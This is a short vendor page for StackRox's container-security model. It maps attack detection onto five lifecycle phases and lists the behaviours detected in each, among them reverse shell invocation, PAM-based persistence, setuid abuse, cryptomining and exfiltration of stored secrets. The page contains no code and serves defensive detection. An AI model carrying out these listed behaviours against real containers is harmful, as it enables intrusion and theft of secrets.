StackRox Adversarial Intent Model (AIM)
StackRox AIM captures a core philosophy that defensive strategy should be built from an offensive perspective.
By examining application deployments through the attacker's lens, StackRox exposes threats by fusing together signals in container environments which correspond to the five iterative phases of an attack’s lifecycle: foothold, persistence, privilege escalation, lateral movement, and objectives.
StackRox deeply understands container attacks and detects a broad range of adversary behaviors across each phase of the AIM
|Foothold||Reverse shell invocation, Java-based code injection attacks|
|Persistence||Database persistence via post of database procedures, user persistence via modification of PAM configurations|
|Privilege Escalation||Execution of setuid/setgid by non-root users|
|Lateral Movement||Anomalous network communication with a client followed by payload execution or unexpected process cloning|
|Objectives||Cryptocurrency mining software, exfiltration of sensitive content via reading stored secrets or accessing confidential file paths|